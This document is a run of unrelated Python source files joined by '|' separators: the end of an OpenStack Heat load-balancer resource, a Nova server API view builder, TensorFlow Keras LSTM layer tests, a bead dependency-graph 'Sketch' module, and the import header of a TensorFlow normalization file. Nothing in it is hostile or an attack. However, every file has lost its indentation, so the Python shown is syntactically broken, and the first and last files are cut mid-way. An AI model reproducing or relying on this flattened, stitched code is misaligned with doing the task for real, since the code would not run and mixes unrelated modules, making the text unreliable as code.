md = templ['Resources']['LB_instance']['Metadata']
files = md['AWS::CloudFormation::Init']['config']['files']
cfg = self._haproxy_config(self.properties[self.INSTANCES])
files['/etc/haproxy/haproxy.cfg']['content'] = cfg
return self.create_with_template(templ, params)
def handle_update(self, json_snippet, tmpl_diff, prop_diff):
"""Re-generate the Metadata.
Save it to the db.
Rely on the cfn-hup to reconfigure HAProxy.
"""
new_props = json_snippet.properties(self.properties_schema,
self.context)
# Valid use cases are:
# - Membership controlled by members property in template
# - Empty members property in template; membership controlled by
# "updates" triggered from autoscaling group.
# Mixing the two will lead to undefined behaviour.
if (self.INSTANCES in prop_diff and
(self.properties[self.INSTANCES] is not None or
new_props[self.INSTANCES] is not None)):
cfg = self._haproxy_config(prop_diff[self.INSTANCES])
md = self.nested()['LB_instance'].metadata_get()
files = md['AWS::CloudFormation::Init']['config']['files']
files['/etc/haproxy/haproxy.cfg']['content'] = cfg
self.nested()['LB_instance'].metadata_set(md)
if self.SECURITY_GROUPS in prop_diff:
templ = self.child_template()
params = self.child_params()
params['SecurityGroups'] = new_props[self.SECURITY_GROUPS]
self.update_with_template(templ, params)
def check_update_complete(self, updater):
"""Because we are not calling update_with_template, return True."""
return True
def validate(self):
"""Validate any of the provided params."""
res = super(LoadBalancer, self).validate()
if res:
return res
if (cfg.CONF.loadbalancer_template and
not os.access(cfg.CONF.loadbalancer_template, os.R_OK)):
msg = _('Custom LoadBalancer template can not be found')
raise exception.StackValidationFailed(message=msg)
health_chk = self.properties[self.HEALTH_CHECK]
if health_chk:
interval = float(health_chk[self.HEALTH_CHECK_INTERVAL])
timeout = float(health_chk[self.HEALTH_CHECK_TIMEOUT])
if interval < timeout:
return {'Error':
'Interval must be larger than Timeout'}
def get_reference_id(self):
return six.text_type(self.name)
def _resolve_attribute(self, name):
"""We don't really support any of these yet."""
if name == self.DNS_NAME:
try:
return self.get_output('PublicIp')
except exception.NotFound:
raise exception.InvalidTemplateAttribute(resource=self.name,
key=name)
elif name in self.attributes_schema:
# Not sure if we should return anything for the other attribs
# since they aren't really supported in any meaningful way
return ''
def resource_mapping():
return {
'AWS::ElasticLoadBalancing::LoadBalancer': LoadBalancer,
}
|
|
# Copyright 2010-2011 OpenStack Foundation
# Copyright 2011 Piston Cloud Computing, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import hashlib
from oslo.utils import timeutils
from nova.api.openstack import common
from nova.api.openstack.compute.views import addresses as views_addresses
from nova.api.openstack.compute.views import flavors as views_flavors
from nova.api.openstack.compute.views import images as views_images
from nova.compute import flavors
from nova.i18n import _LW
from nova.objects import base as obj_base
from nova.openstack.common import log as logging
from nova import utils
LOG = logging.getLogger(__name__)
class ViewBuilder(common.ViewBuilder):
"""Model a server API response as a python dictionary."""
_collection_name = "servers"
_progress_statuses = (
"ACTIVE",
"BUILD",
"REBUILD",
"RESIZE",
"VERIFY_RESIZE",
)
_fault_statuses = (
"ERROR", "DELETED"
)
def __init__(self):
"""Initialize view builder."""
super(ViewBuilder, self).__init__()
self._address_builder = views_addresses.ViewBuilder()
self._flavor_builder = views_flavors.ViewBuilder()
self._image_builder = views_images.ViewBuilder()
def create(self, request, instance):
"""View that should be returned when an instance is created."""
return {
"server": {
"id": instance["uuid"],
"links": self._get_links(request,
instance["uuid"],
self._collection_name),
},
}
def basic(self, request, instance):
"""Generic, non-detailed view of an instance."""
return {
"server": {
"id": instance["uuid"],
"name": instance["display_name"],
"links": self._get_links(request,
instance["uuid"],
self._collection_name),
},
}
def show(self, request, instance):
"""Detailed view of a single instance."""
ip_v4 = instance.get('access_ip_v4')
ip_v6 = instance.get('access_ip_v6')
server = {
"server": {
"id": instance["uuid"],
"name": instance["display_name"],
"status": self._get_vm_status(instance),
"tenant_id": instance.get("project_id") or "",
"user_id": instance.get("user_id") or "",
"metadata": self._get_metadata(instance),
"hostId": self._get_host_id(instance) or "",
"image": self._get_image(request, instance),
"flavor": self._get_flavor(request, instance),
"created": timeutils.isotime(instance["created_at"]),
"updated": timeutils.isotime(instance["updated_at"]),
"addresses": self._get_addresses(request, instance),
"accessIPv4": str(ip_v4) if ip_v4 is not None else '',
"accessIPv6": str(ip_v6) if ip_v6 is not None else '',
"links": self._get_links(request,
instance["uuid"],
self._collection_name),
},
}
if server["server"]["status"] in self._fault_statuses:
_inst_fault = self._get_fault(request, instance)
if _inst_fault:
server['server']['fault'] = _inst_fault
if server["server"]["status"] in self._progress_statuses:
server["server"]["progress"] = instance.get("progress", 0)
return server
def index(self, request, instances):
"""Show a list of servers without many details."""
coll_name = self._collection_name
return self._list_view(self.basic, request, instances, coll_name)
def detail(self, request, instances):
"""Detailed view of a list of instance."""
coll_name = self._collection_name + '/detail'
return self._list_view(self.show, request, instances, coll_name)
def _list_view(self, func, request, servers, coll_name):
"""Provide a view for a list of servers.
:param func: Function used to format the server data
:param request: API request
:param servers: List of servers in dictionary format
:param coll_name: Name of collection, used to generate the next link
for a pagination query
:returns: Server data in dictionary format
"""
server_list = [func(request, server)["server"] for server in servers]
servers_links = self._get_collection_links(request,
servers,
coll_name)
servers_dict = dict(servers=server_list)
if servers_links:
servers_dict["servers_links"] = servers_links
return servers_dict
@staticmethod
def _get_metadata(instance):
# FIXME(danms): Transitional support for objects
metadata = instance.get('metadata')
if isinstance(instance, obj_base.NovaObject):
return metadata or {}
else:
return utils.instance_meta(instance)
@staticmethod
def _get_vm_status(instance):
# If the instance is deleted the vm and task states don't really matter
if instance.get("deleted"):
return "DELETED"
return common.status_from_state(instance.get("vm_state"),
instance.get("task_state"))
@staticmethod
def _get_host_id(instance):
host = instance.get("host")
project = str(instance.get("project_id"))
if host:
sha_hash = hashlib.sha224(project + host) # pylint: disable=E1101
return sha_hash.hexdigest()
def _get_addresses(self, request, instance):
context = request.environ["nova.context"]
networks = common.get_networks_for_instance(context, instance)
return self._address_builder.index(networks)["addresses"]
def _get_image(self, request, instance):
image_ref = instance["image_ref"]
if image_ref:
image_id = str(common.get_id_from_href(image_ref))
bookmark = self._image_builder._get_bookmark_link(request,
image_id,
"images")
return {
"id": image_id,
"links": [{
"rel": "bookmark",
"href": bookmark,
}],
}
else:
return ""
def _get_flavor(self, request, instance):
instance_type = flavors.extract_flavor(instance)
if not instance_type:
LOG.warn(_LW("Instance has had its instance_type removed "
"from the DB"), instance=instance)
return {}
flavor_id = instance_type["flavorid"]
flavor_bookmark = self._flavor_builder._get_bookmark_link(request,
flavor_id,
"flavors")
return {
"id": str(flavor_id),
"links": [{
"rel": "bookmark",
"href": flavor_bookmark,
}],
}
def _get_fault(self, request, instance):
# This can result in a lazy load of the fault information
fault = instance.fault
if not fault:
return None
fault_dict = {
"code": fault["code"],
"created": timeutils.isotime(fault["created_at"]),
"message": fault["message"],
}
if fault.get('details', None):
is_admin = False
context = request.environ["nova.context"]
if context:
is_admin = getattr(context, 'is_admin', False)
if is_admin or fault['code'] != 500:
fault_dict['details'] = fault["details"]
return fault_dict
class ViewBuilderV3(ViewBuilder):
"""Model a server V3 API response as a python dictionary."""
def __init__(self):
"""Initialize view builder."""
super(ViewBuilderV3, self).__init__()
self._address_builder = views_addresses.ViewBuilderV3()
        # TODO(alex_xu): In the V3 API we corrected the image bookmark link to
        # use the glance endpoint. We revert it back to the nova endpoint for
        # v2.1.
self._image_builder = views_images.ViewBuilder()
def show(self, request, instance):
"""Detailed view of a single instance."""
server = {
"server": {
"id": instance["uuid"],
"name": instance["display_name"],
"status": self._get_vm_status(instance),
"tenant_id": instance.get("project_id") or "",
"user_id": instance.get("user_id") or "",
"metadata": self._get_metadata(instance),
"hostId": self._get_host_id(instance) or "",
                # TODO(alex_xu): '_get_image' returns {} when image_ref does
                # not exist in the V3 API; we revert it back to returning ""
                # in V2.1.
"image": self._get_image(request, instance),
"flavor": self._get_flavor(request, instance),
"created": timeutils.isotime(instance["created_at"]),
"updated": timeutils.isotime(instance["updated_at"]),
"addresses": self._get_addresses(request, instance),
"links": self._get_links(request,
instance["uuid"],
self._collection_name),
},
}
if server["server"]["status"] in self._fault_statuses:
_inst_fault = self._get_fault(request, instance)
if _inst_fault:
server['server']['fault'] = _inst_fault
if server["server"]["status"] in self._progress_statuses:
server["server"]["progress"] = instance.get("progress", 0)
return server
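# Hedged usage sketch (illustrative only): `req` and `inst` are hypothetical
# stand-ins for the real WSGI request and instance dict; the returned shape
# mirrors ViewBuilder.basic() above.
#
#     builder = ViewBuilder()
#     body = builder.basic(req, inst)
#     # body == {"server": {"id": inst["uuid"],
#     #                     "name": inst["display_name"],
#     #                     "links": [...]}}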
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for LSTM layer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.eager import context
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.platform import test
from tensorflow.python.training import adam
from tensorflow.python.training import gradient_descent
@keras_parameterized.run_all_keras_modes
class LSTMLayerTest(keras_parameterized.TestCase):
def test_return_sequences_LSTM(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
testing_utils.layer_test(
keras.layers.LSTM,
kwargs={'units': units,
'return_sequences': True},
input_shape=(num_samples, timesteps, embedding_dim))
@test.disable_with_predicate(
pred=test.is_built_with_rocm,
      skip_message='Double type is not yet supported in ROCm')
@testing_utils.run_v2_only
def test_float64_LSTM(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
testing_utils.layer_test(
keras.layers.LSTM,
kwargs={'units': units,
'return_sequences': True,
'dtype': 'float64'},
input_shape=(num_samples, timesteps, embedding_dim),
input_dtype='float64')
def test_static_shape_inference_LSTM(self):
# Github issue: 15165
timesteps = 3
embedding_dim = 4
units = 2
model = keras.models.Sequential()
inputs = keras.layers.Dense(embedding_dim,
input_shape=(timesteps, embedding_dim))
model.add(inputs)
layer = keras.layers.LSTM(units, return_sequences=True)
model.add(layer)
outputs = model.layers[-1].output
self.assertEqual(outputs.shape.as_list(), [None, timesteps, units])
def test_dynamic_behavior_LSTM(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
layer = keras.layers.LSTM(units, input_shape=(None, embedding_dim))
model = keras.models.Sequential()
model.add(layer)
model.compile(
'rmsprop',
'mse',
run_eagerly=testing_utils.should_run_eagerly())
x = np.random.random((num_samples, timesteps, embedding_dim))
y = np.random.random((num_samples, units))
model.train_on_batch(x, y)
def test_dropout_LSTM(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
testing_utils.layer_test(
keras.layers.LSTM,
kwargs={'units': units,
'dropout': 0.1,
'recurrent_dropout': 0.1},
input_shape=(num_samples, timesteps, embedding_dim))
def test_recurrent_dropout_with_implementation_restriction(self):
layer = keras.layers.LSTM(2, recurrent_dropout=0.1, implementation=2)
    # The implementation is forced to 1 due to the recurrent_dropout limit.
self.assertEqual(layer.implementation, 1)
@parameterized.parameters([0, 1, 2])
def test_implementation_mode_LSTM(self, implementation_mode):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
testing_utils.layer_test(
keras.layers.LSTM,
kwargs={'units': units,
'implementation': implementation_mode},
input_shape=(num_samples, timesteps, embedding_dim))
def test_constraints_LSTM(self):
embedding_dim = 4
layer_class = keras.layers.LSTM
k_constraint = keras.constraints.max_norm(0.01)
r_constraint = keras.constraints.max_norm(0.01)
b_constraint = keras.constraints.max_norm(0.01)
layer = layer_class(
5,
return_sequences=False,
weights=None,
input_shape=(None, embedding_dim),
kernel_constraint=k_constraint,
recurrent_constraint=r_constraint,
bias_constraint=b_constraint)
layer.build((None, None, embedding_dim))
self.assertEqual(layer.cell.kernel.constraint, k_constraint)
self.assertEqual(layer.cell.recurrent_kernel.constraint, r_constraint)
self.assertEqual(layer.cell.bias.constraint, b_constraint)
@parameterized.parameters([True, False])
@test.disable_with_predicate(
pred=test.is_built_with_rocm,
skip_message='Skipping as ROCm MIOpen does not support padded input.')
def test_with_masking_layer_LSTM(self, unroll):
layer_class = keras.layers.LSTM
inputs = np.random.random((2, 3, 4))
targets = np.abs(np.random.random((2, 3, 5)))
targets /= targets.sum(axis=-1, keepdims=True)
model = keras.models.Sequential()
model.add(keras.layers.Masking(input_shape=(3, 4)))
model.add(layer_class(units=5, return_sequences=True, unroll=unroll))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
run_eagerly=testing_utils.should_run_eagerly())
model.fit(inputs, targets, epochs=1, batch_size=2, verbose=1)
@parameterized.parameters([True, False])
def test_masking_with_stacking_LSTM(self, unroll):
inputs = np.random.random((2, 3, 4))
targets = np.abs(np.random.random((2, 3, 5)))
targets /= targets.sum(axis=-1, keepdims=True)
model = keras.models.Sequential()
model.add(keras.layers.Masking(input_shape=(3, 4)))
lstm_cells = [keras.layers.LSTMCell(10), keras.layers.LSTMCell(5)]
model.add(keras.layers.RNN(
lstm_cells, return_sequences=True, unroll=unroll))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
run_eagerly=testing_utils.should_run_eagerly())
model.fit(inputs, targets, epochs=1, batch_size=2, verbose=1)
def test_from_config_LSTM(self):
layer_class = keras.layers.LSTM
for stateful in (False, True):
l1 = layer_class(units=1, stateful=stateful)
l2 = layer_class.from_config(l1.get_config())
assert l1.get_config() == l2.get_config()
def test_deep_copy_LSTM(self):
cell = keras.layers.LSTMCell(5)
copied_cell = copy.deepcopy(cell)
self.assertEqual(copied_cell.units, 5)
self.assertEqual(cell.get_config(), copied_cell.get_config())
def test_specify_initial_state_keras_tensor(self):
num_states = 2
timesteps = 3
embedding_dim = 4
units = 3
num_samples = 2
# Test with Keras tensor
inputs = keras.Input((timesteps, embedding_dim))
initial_state = [keras.Input((units,)) for _ in range(num_states)]
layer = keras.layers.LSTM(units)
if len(initial_state) == 1:
output = layer(inputs, initial_state=initial_state[0])
else:
output = layer(inputs, initial_state=initial_state)
self.assertTrue(
any(initial_state[0] is t
for t in layer._inbound_nodes[0].input_tensors))
model = keras.models.Model([inputs] + initial_state, output)
model.compile(
loss='categorical_crossentropy',
optimizer=adam.AdamOptimizer(),
run_eagerly=testing_utils.should_run_eagerly())
inputs = np.random.random((num_samples, timesteps, embedding_dim))
initial_state = [np.random.random((num_samples, units))
for _ in range(num_states)]
targets = np.random.random((num_samples, units))
model.train_on_batch([inputs] + initial_state, targets)
def test_specify_initial_state_non_keras_tensor(self):
num_states = 2
timesteps = 3
embedding_dim = 4
units = 3
num_samples = 2
# Test with non-Keras tensor
inputs = keras.Input((timesteps, embedding_dim))
initial_state = [keras.backend.random_normal_variable(
(num_samples, units), 0, 1)
for _ in range(num_states)]
layer = keras.layers.LSTM(units)
output = layer(inputs, initial_state=initial_state)
model = keras.models.Model(inputs, output)
model.compile(
loss='categorical_crossentropy',
optimizer=adam.AdamOptimizer(),
run_eagerly=testing_utils.should_run_eagerly())
inputs = np.random.random((num_samples, timesteps, embedding_dim))
targets = np.random.random((num_samples, units))
model.train_on_batch(inputs, targets)
def test_reset_states_with_values(self):
num_states = 2
timesteps = 3
embedding_dim = 4
units = 3
num_samples = 2
layer = keras.layers.LSTM(units, stateful=True)
layer.build((num_samples, timesteps, embedding_dim))
layer.reset_states()
assert len(layer.states) == num_states
assert layer.states[0] is not None
self.assertAllClose(
keras.backend.eval(layer.states[0]),
np.zeros(keras.backend.int_shape(layer.states[0])),
atol=1e-4)
state_shapes = [keras.backend.int_shape(state) for state in layer.states]
values = [np.ones(shape) for shape in state_shapes]
if len(values) == 1:
values = values[0]
layer.reset_states(values)
self.assertAllClose(
keras.backend.eval(layer.states[0]),
np.ones(keras.backend.int_shape(layer.states[0])),
atol=1e-4)
# Test with invalid data
with self.assertRaises(ValueError):
layer.reset_states([1] * (len(layer.states) + 1))
def test_specify_state_with_masking(self):
num_states = 2
timesteps = 3
embedding_dim = 4
units = 3
num_samples = 2
inputs = keras.Input((timesteps, embedding_dim))
_ = keras.layers.Masking()(inputs)
initial_state = [keras.Input((units,)) for _ in range(num_states)]
output = keras.layers.LSTM(units)(inputs, initial_state=initial_state)
model = keras.models.Model([inputs] + initial_state, output)
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
run_eagerly=testing_utils.should_run_eagerly())
inputs = np.random.random((num_samples, timesteps, embedding_dim))
initial_state = [np.random.random((num_samples, units))
for _ in range(num_states)]
targets = np.random.random((num_samples, units))
model.train_on_batch([inputs] + initial_state, targets)
def test_return_state(self):
num_states = 2
timesteps = 3
embedding_dim = 4
units = 3
num_samples = 2
inputs = keras.Input(batch_shape=(num_samples, timesteps, embedding_dim))
layer = keras.layers.LSTM(units, return_state=True, stateful=True)
outputs = layer(inputs)
state = outputs[1:]
assert len(state) == num_states
model = keras.models.Model(inputs, state[0])
inputs = np.random.random((num_samples, timesteps, embedding_dim))
state = model.predict(inputs)
self.assertAllClose(keras.backend.eval(layer.states[0]), state, atol=1e-4)
def test_state_reuse(self):
timesteps = 3
embedding_dim = 4
units = 3
num_samples = 2
inputs = keras.Input(batch_shape=(num_samples, timesteps, embedding_dim))
layer = keras.layers.LSTM(units, return_state=True, return_sequences=True)
outputs = layer(inputs)
output, state = outputs[0], outputs[1:]
output = keras.layers.LSTM(units)(output, initial_state=state)
model = keras.models.Model(inputs, output)
inputs = np.random.random((num_samples, timesteps, embedding_dim))
outputs = model.predict(inputs)
def test_initial_states_as_other_inputs(self):
timesteps = 3
embedding_dim = 4
units = 3
num_samples = 2
num_states = 2
layer_class = keras.layers.LSTM
# Test with Keras tensor
main_inputs = keras.Input((timesteps, embedding_dim))
initial_state = [keras.Input((units,)) for _ in range(num_states)]
inputs = [main_inputs] + initial_state
layer = layer_class(units)
output = layer(inputs)
self.assertTrue(
any(initial_state[0] is t
for t in layer._inbound_nodes[0].input_tensors))
model = keras.models.Model(inputs, output)
model.compile(
loss='categorical_crossentropy',
optimizer=adam.AdamOptimizer(),
run_eagerly=testing_utils.should_run_eagerly())
main_inputs = np.random.random((num_samples, timesteps, embedding_dim))
initial_state = [np.random.random((num_samples, units))
for _ in range(num_states)]
targets = np.random.random((num_samples, units))
model.train_on_batch([main_inputs] + initial_state, targets)
def test_regularizers_LSTM(self):
embedding_dim = 4
layer_class = keras.layers.LSTM
layer = layer_class(
5,
return_sequences=False,
weights=None,
input_shape=(None, embedding_dim),
kernel_regularizer=keras.regularizers.l1(0.01),
recurrent_regularizer=keras.regularizers.l1(0.01),
bias_regularizer='l2',
activity_regularizer='l1')
layer.build((None, None, 2))
self.assertEqual(len(layer.losses), 3)
x = keras.backend.variable(np.ones((2, 3, 2)))
layer(x)
if context.executing_eagerly():
self.assertEqual(len(layer.losses), 4)
else:
self.assertEqual(len(layer.get_losses_for(x)), 1)
@test.disable_with_predicate(
pred=test.is_built_with_rocm,
skip_message='Skipping as ROCm MIOpen does not support padded input.')
def test_statefulness_LSTM(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
layer_class = keras.layers.LSTM
model = keras.models.Sequential()
model.add(
keras.layers.Embedding(
4,
embedding_dim,
mask_zero=True,
input_length=timesteps,
batch_input_shape=(num_samples, timesteps)))
layer = layer_class(
units, return_sequences=False, stateful=True, weights=None)
model.add(layer)
model.compile(
optimizer=gradient_descent.GradientDescentOptimizer(0.01),
loss='mse',
run_eagerly=testing_utils.should_run_eagerly())
out1 = model.predict(np.ones((num_samples, timesteps)))
self.assertEqual(out1.shape, (num_samples, units))
# train once so that the states change
model.train_on_batch(
np.ones((num_samples, timesteps)), np.ones((num_samples, units)))
out2 = model.predict(np.ones((num_samples, timesteps)))
# if the state is not reset, output should be different
self.assertNotEqual(out1.max(), out2.max())
# check that output changes after states are reset
# (even though the model itself didn't change)
layer.reset_states()
out3 = model.predict(np.ones((num_samples, timesteps)))
self.assertNotEqual(out2.max(), out3.max())
# check that container-level reset_states() works
model.reset_states()
out4 = model.predict(np.ones((num_samples, timesteps)))
self.assertAllClose(out3, out4, atol=1e-5)
# check that the call to `predict` updated the states
out5 = model.predict(np.ones((num_samples, timesteps)))
self.assertNotEqual(out4.max(), out5.max())
# Check masking
layer.reset_states()
left_padded_input = np.ones((num_samples, timesteps))
left_padded_input[0, :1] = 0
left_padded_input[1, :2] = 0
out6 = model.predict(left_padded_input)
layer.reset_states()
right_padded_input = np.ones((num_samples, timesteps))
right_padded_input[0, -1:] = 0
right_padded_input[1, -2:] = 0
out7 = model.predict(right_padded_input)
self.assertAllClose(out7, out6, atol=1e-5)
if __name__ == '__main__':
test.main()
|
|
import itertools
from typing import Set, Dict, List, Tuple, Sequence, Iterable
import attr
from cached_property import cached_property
from bead.tech.timestamp import EPOCH_STR
from .freshness import UP_TO_DATE, OUT_OF_DATE
from .dummy import Dummy
from .cluster import Cluster, create_cluster_index
from .io import read_beads, write_beads
from . import graphviz
from .graph import (
Edge,
Ref,
generate_input_edges,
group_by_src,
group_by_dest,
toposort,
closure,
bead_index_from_edges,
refs_from_beads,
refs_from_edges,
)
@attr.s(frozen=True, auto_attribs=True)
class Sketch:
beads: Tuple[Dummy, ...]
edges: Tuple[Edge, ...]
def __attrs_post_init__(self):
assert refs_from_edges(self.edges) - refs_from_beads(self.beads) == set()
@classmethod
def from_beads(cls, beads: Sequence[Dummy]):
bead_index = Ref.index_for(beads)
edges = tuple(
itertools.chain.from_iterable(
generate_input_edges(bead_index, bead)
for bead in beads))
return cls(tuple(bead_index.values()), edges)
@classmethod
def from_edges(cls, edges: Sequence[Edge]):
beads = bead_index_from_edges(edges).values()
return cls(tuple(beads), tuple(edges))
@classmethod
def from_file(cls, file_name):
beads = read_beads(file_name)
return cls.from_beads(beads)
def to_file(self, file_name):
write_beads(file_name, self.beads)
@cached_property
def cluster_by_name(self) -> Dict[str, Cluster]:
return create_cluster_index(self.beads)
@cached_property
def clusters(self):
return tuple(self.cluster_by_name.values())
def color_beads(self):
color_beads(self)
def as_dot(self):
return plot_clusters_as_dot(self)
def drop_deleted_inputs(self) -> "Sketch":
return drop_deleted_inputs(self)
def simplify(sketch: Sketch) -> Sketch:
"""
Remove unreferenced clusters and beads.
Makes a new instance
"""
raise NotImplementedError
def heads_of(sketch: Sketch) -> Sketch:
"""
Keep only cluster heads and their inputs.
Makes a new instance
"""
head_by_ref = {c.head.ref: c.head for c in sketch.clusters}
head_edges = tuple(e for e in sketch.edges if e.dest_ref in head_by_ref)
src_by_ref = {e.src_ref: e.src for e in head_edges}
heads = {**head_by_ref, **src_by_ref}.values()
return Sketch(beads=tuple(heads), edges=head_edges)
def add_final_sink_to(sketch: Sketch) -> Tuple[Sketch, Dummy]:
"""
Add a new node, and edges from all nodes.
This makes a DAG fully connected and the new node a sink node.
The added sink node is special (guaranteed to have a unique name, freshness is UP_TO_DATE).
Returns the extended Sketch and the new sink node.
Makes a new instance
"""
sink_name = '*' * (1 + max((len(bead.name) for bead in sketch.beads), default=0))
sink = Dummy(
name=sink_name,
content_id=sink_name,
kind=sink_name,
freeze_time_str='SINK',
freshness=UP_TO_DATE
)
sink_edges = (Edge(src, sink) for src in sketch.beads)
return (
Sketch(
beads=sketch.beads + tuple([sink]),
edges=sketch.edges + tuple(sink_edges)
),
sink
)
def set_sources(sketch: Sketch, cluster_names: List[str]) -> Sketch:
"""
    Drop all clusters that are not reachable from the named clusters.
Makes a new instance
"""
cluster_filter = ClusterFilter(sketch)
edges = cluster_filter.get_encoded_edges()
root_refs = cluster_filter.get_encoded_refs(cluster_names)
cluster_refs_to_keep = closure(root_refs, group_by_src(edges))
return cluster_filter.get_filtered_by_refs(cluster_refs_to_keep)
def set_sinks(sketch: Sketch, cluster_names: List[str]) -> Sketch:
"""
    Drop all clusters that do not lead to any of the named clusters.
Makes a new instance
"""
cluster_filter = ClusterFilter(sketch)
edges = cluster_filter.get_encoded_edges()
edges = [e.reversed() for e in edges]
root_refs = cluster_filter.get_encoded_refs(cluster_names)
cluster_refs_to_keep = closure(root_refs, group_by_src(edges))
return cluster_filter.get_filtered_by_refs(cluster_refs_to_keep)
class ClusterFilter:
def __init__(self, sketch):
self.sketch = sketch
self.dummy_by_name = {
name: Dummy(
name=name,
content_id=name,
kind=name,
freeze_time_str=EPOCH_STR,
)
for name in sketch.cluster_by_name
}
def get_encoded_edges(self) -> Sequence[Edge]:
src_dest_pairs = self.convert_to_name_pairs(self.sketch.edges)
return [
Edge(
self.dummy_by_name[src],
self.dummy_by_name[dest])
for src, dest in src_dest_pairs
]
def get_encoded_refs(self, bead_names: Iterable[str]) -> List[Ref]:
return [
self.dummy_by_name[name].ref
for name in sorted(set(bead_names))
if name in self.dummy_by_name
]
def get_filtered_by_refs(self, encoded_refs) -> Sketch:
src_dest_pairs = self.convert_to_name_pairs(self.sketch.edges)
clusters_to_keep = {r.name for r in encoded_refs}
cluster_edges_to_keep = {
(src, dest)
for src, dest in src_dest_pairs
if src in clusters_to_keep and dest in clusters_to_keep
}
encoded_edges = [
Edge(
self.dummy_by_name[src],
self.dummy_by_name[dest],
)
for src, dest in cluster_edges_to_keep
]
return self.get_filtered_by_edges(encoded_edges)
def get_filtered_by_edges(self, encoded_edges: Iterable[Edge]) -> Sketch:
src_dest_pairs = self.convert_to_name_pairs(encoded_edges)
bead_names = {src for src, _ in src_dest_pairs} | {dest for _, dest in src_dest_pairs}
assert bead_names - set(self.dummy_by_name) == set()
beads = tuple(b for b in self.sketch.beads if b.name in bead_names)
edges = tuple(e for e in self.sketch.edges if (e.src.name, e.dest.name) in src_dest_pairs)
return Sketch(beads, edges).drop_deleted_inputs()
def convert_to_name_pairs(self, edges: Iterable[Edge]) -> Set[Tuple[str, str]]:
return {(e.src.name, e.dest.name) for e in edges}
def drop_before(sketch: Sketch, timestamp) -> Sketch:
"""
    Keep only beads that are after the given timestamp.
Makes a new instance
"""
raise NotImplementedError
def drop_after(sketch: Sketch, timestamp) -> Sketch:
"""
    Keep only beads that are before the given timestamp.
Makes a new instance
"""
raise NotImplementedError
def plot_clusters_as_dot(sketch: Sketch):
"""
    Generate GraphViz .dot file content, which describes the connections
    between beads and their up-to-date status.
"""
formatted_bead_clusters = '\n\n'.join(c.as_dot for c in sketch.clusters)
graphviz_context = graphviz.Context()
def format_inputs():
def edges_as_dot():
for edge in sketch.edges:
is_auxiliary_edge = (
edge.dest.freshness not in (OUT_OF_DATE, UP_TO_DATE))
yield graphviz_context.dot_edge(edge.src, edge.dest, edge.label, is_auxiliary_edge)
return '\n'.join(edges_as_dot())
return graphviz.DOT_GRAPH_TEMPLATE.format(
bead_clusters=formatted_bead_clusters,
bead_inputs=format_inputs())
def color_beads(sketch: Sketch) -> bool:
"""
Assign up-to-dateness status (freshness) to beads.
"""
heads, sink = add_final_sink_to(heads_of(sketch))
head_eval_order = toposort(heads.edges)
if not head_eval_order: # empty
return True
assert head_eval_order[-1] == sink
for cluster in sketch.clusters:
cluster.reset_freshness()
    # downgrade UP_TO_DATE freshness if a head has a non-UP_TO_DATE input
edges_by_dest = group_by_dest(heads.edges)
for cluster_head in head_eval_order:
if cluster_head.freshness is UP_TO_DATE:
if any(e.src.freshness is not UP_TO_DATE for e in edges_by_dest[cluster_head.ref]):
cluster_head.set_freshness(OUT_OF_DATE)
return sink.freshness is UP_TO_DATE
def drop_deleted_inputs(sketch: Sketch) -> Sketch:
edges_as_refs = {(edge.src_ref, edge.dest_ref) for edge in sketch.edges}
beads = []
for bead in sketch.beads:
inputs_to_keep = []
for input in bead.inputs:
input_ref = Ref.from_bead_input(bead, input)
if (input_ref, bead.ref) in edges_as_refs:
inputs_to_keep.append(input)
beads.append(attr.evolve(bead, inputs=inputs_to_keep))
return Sketch.from_beads(beads)
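# Hedged usage sketch (the file name is hypothetical; the calls mirror the
# Sketch API defined above):
#
#     sketch = Sketch.from_file('beads_dump')
#     sketch.color_beads()          # assign UP_TO_DATE / OUT_OF_DATE freshness
#     dot_source = sketch.as_dot()  # GraphViz description of clusters + edges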
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
# pylint: disable=unused-import,g-bad-import-order
"""Contains the normalization layer classes and their functional aliases.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import six
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import standard_ops
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.training import moving_averages
from tensorflow.python.framework import tensor_util
